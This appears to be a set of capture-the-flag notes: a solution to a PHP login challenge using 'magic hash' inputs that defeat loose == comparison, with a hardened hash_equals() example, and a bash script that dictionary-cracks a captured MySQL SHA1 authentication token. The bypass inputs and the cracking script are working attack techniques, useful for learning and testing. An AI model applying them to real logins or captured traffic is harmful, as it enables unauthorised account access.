
# GynvaelEN mission 018


```
# curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/admin.php?password1=240610708&password2=10932435112'
Welcome back dear admin.
Your flag: I'm not sure this is how equality is supposed to work.

Now try with <a href='superadmin.php'>superadmin.php</a>!
# curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/superadmin.php'
...
if (hash("sha256", $_GET['password']) ==
'0e12345678901234567890123456789012345678901234567890123456789012')
...
```
_:)
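
The `==` comparison printed by superadmin.php, next to a hardened form, as an added example (not code from the mission or its author). The function names and the stored values are assumptions made for illustration; the two inputs are the ones from the curl request above, hashed here with md5 and sha1 respectively, which is an assumption about admin.php.

```php
<?php
// Added example: loose vs. strict comparison of hex digests in PHP.
// check_loose(), check_strict(), is_magic() and $cases are hypothetical.

// Vulnerable: when both operands are numeric strings, == compares them as
// numbers, so any two digests of the form 0e<digits> both evaluate to 0.
function check_loose(string $algo, string $input, string $stored): bool {
    return hash($algo, $input) == $stored;
}

// Hardened: hash_equals() compares the strings byte for byte, in constant time.
function check_strict(string $algo, string $input, string $stored): bool {
    return hash_equals($stored, hash($algo, $input));
}

// True when a digest would be read as a number in scientific notation.
function is_magic(string $digest): bool {
    return preg_match('/^0+e[0-9]+$/', $digest) === 1;
}

// Constructed stored values: the literal shown by superadmin.php, cut to
// md5 and sha1 length. They are not the digest of any known password.
$literal = '0e12345678901234567890123456789012345678901234567890123456789012';
$cases = [
    ['md5',  '240610708',   substr($literal, 0, 32)],
    ['sha1', '10932435112', substr($literal, 0, 40)],
];

foreach ($cases as [$algo, $input, $stored]) {
    $digest = hash($algo, $input);
    printf("%-4s %-12s %s\n", $algo, $input, $digest);
    printf("  magic=%s  loose=%s  strict=%s\n",
        var_export(is_magic($digest), true),
        var_export(check_loose($algo, $input, $stored), true),
        var_export(check_strict($algo, $input, $stored), true));
}
```

The `is_magic()` check can also be run over stored digests to find entries that a remaining `==` comparison would treat as zero.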

Source

https://www.youtube.com/watch?v=adHOlKKbFXM (2:00:22)

References

https://www.whitehatsec.com/blog/magic-hashes/

# MySQL password challenge (sha1, salt)

Introduction

The 'networking 2' challenge of the sbd 2011 wargame provides a pcap containing the authentication process against a MySQL database.
We will use a different salt and password.
Salt: x8MXV%QLgDZ{ypGN6^Y#
Password: d648fcba578670abf1ec93b0dce1b41f681dc71c

Execution
```
# cat diccionario.txt
hack
tracking
wargame
# cat mysql_sha1_salt.sh
#!/bin/bash
# Dictionary check against a captured MySQL authentication token:
#   token = SHA1(password) XOR SHA1(salt + SHA1(SHA1(password)))
# Usage: ./mysql_sha1_salt.sh <salt> <dictionary file> <captured token (hex)>

# SHA1 of stdin, printed as 40 hex digits
function sha1_hex {
 sha1sum | cut -d ' ' -f1
}
# Hex string -> raw bytes on stdout. The bytes are always piped, never stored
# in a variable: bash drops NUL bytes and word-splits unquoted binary data.
function hex2bin {
 printf %s "$1" | xxd -r -p
}
# XOR two hex strings of the given length, one hex digit at a time
function xor {
 local length=$(( $1 - 1 )) string_a=$2 string_b=$3 xored="" i
 for i in $(seq 0 "$length")
 do
  xored+=$(printf %x $(( 0x${string_a:$i:1} ^ 0x${string_b:$i:1} )))
 done
 printf %s "$xored"
}

salt=$1
password_file=$2
captured_password=$3

while IFS= read -r secret
do
 # stage 1: SHA1(password)
 hash_stage_1=$(printf %s "$secret" | sha1_hex)
 # stage 2: SHA1 of the raw stage 1 bytes
 hash_stage_2=$(hex2bin "$hash_stage_1" | sha1_hex)
 # stage 3: SHA1(salt + raw stage 2 bytes)
 hash_stage_3=$( { printf %s "$salt"; hex2bin "$hash_stage_2"; } | sha1_hex)
 generated_password=$(xor 40 "$hash_stage_1" "$hash_stage_3")
 if [ "$generated_password" == "$captured_password" ]
 then
  echo "$secret --> $captured_password"
 fi
done < "$password_file"
# ./mysql_sha1_salt.sh x8MXV%QLgDZ{ypGN6^Y# \
diccionario.txt \
d648fcba578670abf1ec93b0dce1b41f681dc71c
tracking --> d648fcba578670abf1ec93b0dce1b41f681dc71c
```